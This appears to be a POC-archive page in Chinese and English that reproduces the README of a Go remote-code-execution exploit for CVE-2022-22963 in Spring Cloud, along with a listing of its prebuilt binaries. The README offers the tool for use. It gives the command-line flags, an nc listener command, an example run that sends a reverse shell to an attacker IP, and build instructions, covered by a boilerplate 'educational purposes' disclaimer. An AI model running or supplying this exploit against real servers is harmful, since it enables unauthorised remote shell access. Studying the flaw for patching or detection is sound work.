关联漏洞
描述
Binaries for CVE-2022-22963
介绍
# CVE-2022-22963
Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service.
**Disclamier: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk**
## Usage
```sh
./CVE-2022-22963 -h
Usage:
CVE-2022-22963 [OPTIONS]
Application Options:
-u, --target-url= Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
-p, --target-port= Port running the service. Example: -p 8080
-i, --attacker-ip= Attacker IPv4 Address. Example: -i 10.10.10.10
-l, --listening-port= Listening port to connect. Example: -l 1337
Help Options:
-h, --help Show this help message
```
Assume a possible vulnerable target is running at `http://somerandomserver.com:8080`. Start `nc` listening on the port `1337`, so we run `nc -lvnp 1337`. Then, run the script/exploit:
```sh
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337
```
## Build from source
If you have `go` installed in your machine, just do:
```sh
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file
```
文件快照
[4.0K] /data/pocs/6d3ac43a2d95c0f462ed4a58ef9112f06705b191
├── [4.0K] binaries
│ ├── [6.9M] CVE-2022-22963-linux-amd64
│ ├── [6.8M] CVE-2022-22963-linux-x32
│ ├── [6.7M] CVE-2022-22963-macOS-amd64
│ ├── [6.9M] CVE-2022-22963-windows-amd64.exe
│ └── [6.9M] CVE-2022-22963-windows-x32.exe
├── [ 158] go.mod
├── [ 382] go.sum
├── [9.2K] main.go
└── [1.2K] README.md
1 directory, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。